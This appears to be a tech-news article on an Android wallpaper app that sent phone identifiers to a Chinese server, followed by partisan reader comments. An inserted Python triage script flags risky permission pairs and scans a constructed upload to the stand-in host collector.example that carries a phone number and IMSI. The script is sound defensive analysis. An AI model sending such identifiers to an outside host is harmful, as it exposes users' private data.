An app distributed through Google's Android Market has collected private data from millions of users and forwarded it to servers in China, validating Apple's uniquely strong stance on mobile security in the iPhone App Store.

The app, which appeared to simply load free custom background wallpapers, was downloaded "anywhere from 1.1 million to 4.6 million times. The exact number isn't known because the Android Market doesn't offer precise data," according to a report by Dean Takahashi of VentureBeat.

The app "collects a user's browsing history, text messages, your phone's SIM card number, subscriber identification, and even your voice mail password. It sends the data to a web site, www.imnet.us. That site is evidently owned by someone in Shenzhen, China," the report noted (see the update by Lookout below, which narrows this list considerably).

The data upload was only discovered after the fact, through forensics performed by Lookout, a mobile security firm that sells virus and malware protection software for Android, Windows Mobile and BlackBerry devices. The findings were announced at the Black Hat security conference in Las Vegas.

(Update: Lookout has clarified in followup comments with AppleInsider that the intent of their "App Genome Project" research was to "identify security threats in the wild and provide insight into how applications are accessing personal data and other phone resources."

The group noted that the Android wallpaper app was "not proven to be malicious," but that the app does "ask the user for specific information around the phone details and that information is transferred to a server [in China]."

Correcting the original VentureBeat story, Lookout stated that "the apps from these developers send several pieces of sensitive data to a server, including a device's phone number, subscriber identifier, and currently programmed voicemail number. The applications we analyzed did not access a device's SMS messages, browsing history, or voicemail password (unless a user manually programmed the voicemail number on the device to include the voicemail password)."

Lookout also reiterated there is "no proof of malicious intent and in the past apps have been a bit overzealous in getting access to sensitive data with no ill intent." Lookout compared the Android wallpaper app copying local data to a Chinese server with a recent App Store title that purported to be a flashlight app while actually including a hidden SOCKS proxy that could be used for tethering.

Lookout added that it hasn't "yet" published a report detailing the Android wallpaper app, suggesting that it is continuing to look at the situation.)

Mobile data theft on the increase

The issue recalls a recent AT&T website leak that could hypothetically have enabled a malicious hacker to access 144,000 iPad 3G users' email addresses.

However, the Android app's data collection actually took place in the wild, against real users, rather than merely being demonstrated by researchers; the data involved (phone number, subscriber identifier and voicemail number) is far more sensitive than an email address; and it affected far more people, by more than an order of magnitude.

iOS vs Android in app security

Apps on any platform can access personal data and forward that data to an external server, but the Lookout research found that 47 percent of the selection of Android apps it looked at incorporated third party code (which may include malicious functions), while only 23 percent of analyzed iPhone apps did.

Apple also approves iOS apps through a strict vetting process before listing them in the App Store, while Google's Android Market relies on the install-time permission prompt: the user is shown the permissions an app requests (for example, to read phone state or access the network) and must decide whether to grant all of them or abandon the install. Nothing in that model checks whether the requested permissions make sense for what the app claims to do.
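The two checks a reviewer would actually run on an app like this, as an added example that is not code from the article or from Lookout: a static pass over the manifest asking whether identity reads and a network path coexist (the question the install-time dialog leaves to the user), and a dynamic pass over one captured upload asking which of the handset's own identifiers appear in it (the forensics step that surfaced the wallpaper apps). The manifest, the HTTP request, the `collector.example` host and the device values are all constructed for illustration; the permission strings and `TelephonyManager` getters are the real Android 2.x names, and the phone number, subscriber identifier and voicemail number are exactly the three fields Lookout's correction lists.

```python
"""Static and dynamic triage of an Android app suspected of uploading phone identity.

Added example, not code from the article or from Lookout. SAMPLE_MANIFEST,
SAMPLE_REQUEST (including the collector.example host) and SAMPLE_DEVICE are
constructed; the permission names and TelephonyManager getters are real.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Identity fields the Lookout update says were uploaded, keyed by the
# permission that gates the corresponding TelephonyManager getter on Android 2.x.
GATED_READS = {
    "android.permission.READ_PHONE_STATE": (
        "phone number (getLine1Number)",
        "subscriber identifier / IMSI (getSubscriberId)",
        "voicemail number (getVoiceMailNumber)",
    ),
    "android.permission.READ_SMS": ("SMS messages",),
    "com.android.browser.permission.READ_HISTORY_BOOKMARKS": ("browser history",),
}
NETWORK_PERMS = {"android.permission.INTERNET"}

# Constructed manifest for a wallpaper app that also asks for phone state.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.wallpapers">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.SET_WALLPAPER"/>
</manifest>"""

# Constructed capture of one upload; collector.example is a placeholder host.
SAMPLE_REQUEST = (
    "POST /report.php?ver=2 HTTP/1.1\r\n"
    "Host: collector.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "pn=%2B1-555-010-0199&imsi=310150123456789&vm=1-555-010-0100&model=Droid"
)

# Constructed values as they would be read from the handset under test.
SAMPLE_DEVICE = {
    "phone number": "+1 555-010-0199",
    "subscriber identifier / IMSI": "310150123456789",
    "voicemail number": "15550100100",
}


def requested_permissions(manifest_xml):
    """Collect every <uses-permission android:name="..."/> value in the manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")
            if el.get(ANDROID_NS + "name")}


def triage_manifest(manifest_xml):
    """Static check: the install dialog lists permissions one by one; the reviewer's
    question is whether identity reads and a network path are both requested."""
    perms = requested_permissions(manifest_xml)
    readable = [f for p in sorted(perms) for f in GATED_READS.get(p, ())]
    has_network = bool(perms & NETWORK_PERMS)
    return {"can_read": readable, "has_network": has_network,
            "flag": bool(readable) and has_network}


def _digits(value):
    return re.sub(r"\D", "", value)


def leaked_fields(raw_request, device):
    """Dynamic check: which of this device's identifiers appear in one captured
    HTTP request? Values are compared digit-only so +1 or dashes cannot hide them."""
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in header_lines)}
    params = parse_qs(urlsplit(target).query)
    if method == "POST":
        params.update(parse_qs(body))
    # Digit-only view of each parameter's values, keyed by parameter name.
    seen = {k: {_digits(v) for v in vals} for k, vals in params.items()}
    leaked = {}
    for field, value in device.items():
        wanted = _digits(value)
        for key, digit_values in seen.items():
            if wanted and wanted in digit_values:
                leaked[field] = key
    return {"host": headers.get("host"), "leaked": leaked}


if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST))
    print(leaked_fields(SAMPLE_REQUEST, SAMPLE_DEVICE))
```

The static pass deliberately flags the combination rather than READ_PHONE_STATE alone: a wallpaper app with phone-state access but no network permission can read the identifiers but has no path to the server, and the dynamic pass is what distinguishes an overzealous permission request from an actual upload.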

Unlike the other mobile platforms Lookout supports, Apple's iOS platform doesn't have a live virus problem, because third party iPhone apps can only be distributed through Apple's curated App Store and apps are forced to run in a segregated sandbox environment where they can't infect the system. That doesn't necessarily mean iOS apps can't forward user data inappropriately, however; Apple has discovered and pulled apps that violated its privacy policies.

Apps must also be signed by a certificate created by Apple, which makes it much harder for malicious developers to anonymously distribute software designed to cause problems or steal data. Apple's security measures also make such efforts less attractive financially, despite the iOS platform's installed base being much larger than Android's.

Exploitable vulnerabilities in the iOS platform have been reported elsewhere, including the Safari browser, but crafting a malicious attack via the browser requires luring users to a malicious site rather than simply distributing a bad app that appears to be useful and genuine.

Lookout chief executive John Hering, the report said, "believes both Google and Apple are on top of policing their app stores, particularly when there are known malware problems with apps," but the report noted it's "unclear what happens" when apps don't actually do what they claim to.

Apple on the money when saying jailbreaking will lead to piracy, viruses, and cause the IPHONE to lose its SECURE environment.
Sure some people find jailbreaking an advantage. But let's think about all the downside as well.

Wait wait wait one damn second. You're trying to tell me that an 'open', unregulated, app store might have malicious apps on it from China? And these apps would collect personal and private data then transmit it to China? NO FREAKING WAY. Google has always been known for protecting user data and sees protecting its customers as a priority. Android is simply the safest phone OS on the market! <insert sarcastic wit here> This whole story comes as no surprise.... <rolls eyes>

I wonder if any EFF members downloaded the pretty wallpaper onto their android phones.

For those who jailbreak their iPhones, they are more likely to get played by malware writers. Now that it is legal to jailbreak I'm sure more people will do it. We may even see a lawsuit from jailbroken iPhone users claiming Apple didn't protect them enough.

From my encounters, the main reason people jailbreak is to get on T-Mobile and away from AT&T. Then they can tether and do all kinds of things AT&T doesn't like. Get the iPhone on T-Mobile and many will stop jailbreaking as it wouldn't be worth it then.

Ha ha!!!!!!
Eric Schmidt tried his damnedest to derail Apple by lauding the so-called freedom of OPEN SOURCE in contrast to Apple's so-called draconian (whatever, Eric) app acceptance practice. Not that anything is wrong with open source per se, but we all know Eric was trying to win over people. This is what we all knew was going to happen. Did you not see the writing on the walls?
There are too many fu***** people thinking Apple is some dumb country bumpkin outfit. THEY AIN'T!!!!!!!
Apple is a world class, and I stress world class, technology company.
Jobs is surrounded by the best and brightest. He gets his information from the source. He knows what the hell he's talking about. The problem is the rest of the industry doesn't want YOU to know the truth. Sh** happens!!!!!

Be patient. It takes some time to make sure one's personal data has not been stolen and exploited, and then it takes more time to come up with a rationalization or some way of muddying the waters so that the whole setup of the Android Market bears no blame.

I’m looking forward to the counterargument. I can’t think of a single angle that is pro-Android on this one.

Quote:

Originally Posted by peter02l

Millions affected. Not a single one complains. And no lawsuits! And yet some of these Android users (who don't even own an iPhone 4) are constantly finding a new thing about the iPhone to carp about.

It is amazing that one modern mobile OS gets denigrated for even the simplest slip up and the other modern mobile OS can make huge errors in design that are well known to fail and barely anyone will ever know it existed despite the number of people it affects.

No issues with the 3 Android phones and two Android tablets in my home, but the spouse's iPhone 4 appears to be dropping calls a bit more than usual today (as indicated by her angrily exclaiming as much upon walking through the door this evening), and the old iPhone 3g didn't take too kindly to that last firmware update.

I think I know the argument Android fanboys will spout: "They should've checked the source code! It's their own fault they didn't. Noobs! I want Android to be mainstream but want it to remain exclusive to tech nerds as well! Just like Linux!" And yet, Apple users are called the elitists.

Seriously though, I feel bad for all the Android users (who aren't fanboys and most likely only use an Android because their network doesn't have an iPhone) whose information has been compromised in the name of OPEN.

Android. The new "Windows" for the mobile environment. Time to start including even more crapware like anti-malware, anti-virus, anti-everything just like its Windows counterpart.

Well, they do love to bleat about how this is the Mac/PC wars all over. I guess they're trying to imitate the PC as much as possible, down to the insecurity of the platform and even the contempt its users have for it!